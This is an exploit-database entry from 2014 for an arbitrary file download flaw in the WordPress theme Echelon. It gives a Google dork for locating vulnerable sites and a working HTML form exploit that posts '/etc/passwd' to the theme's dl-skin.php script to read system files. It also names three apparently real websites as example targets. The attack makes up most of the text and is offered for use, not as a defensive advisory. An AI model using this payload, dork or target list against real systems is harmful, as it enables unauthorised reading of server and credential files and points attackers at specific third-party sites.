id: 22356
date: 06/20/2014
title: Wordpress Theme Echelon Arbitrary File Download Vulnerability
author: Aloulou
cves: 

############################################################################
 
# Title : Wordpress Theme Echelon Arbitrary File Download Vulnerability   
 
# Author : Aloulou                                             
 
# Date : 19/06/2014                                                    
 
# Facebook : http://www.facebook.com/Aloulou.TN                               
 
# Email: aloulou@alquds.com
 
# Vendor : www.wordpress.org                                                     
 
# Google Dork : inurl:/wp-content/themes/echelon 
 
# Tested on : Linux
                        
 
 
############################################################################
 

 
Exploit:
 
<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/echelon/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value=Download>
</form>
</body>
</html>



    
 
Examples:
http://www.maatea.fr
http://www.franklinide.com
http://hotelmoselanker.com
 
# Greeting to : Tunisia ,  CyberPink , AnonBoy and All muslims

#  0day.today [2023-03-22]  #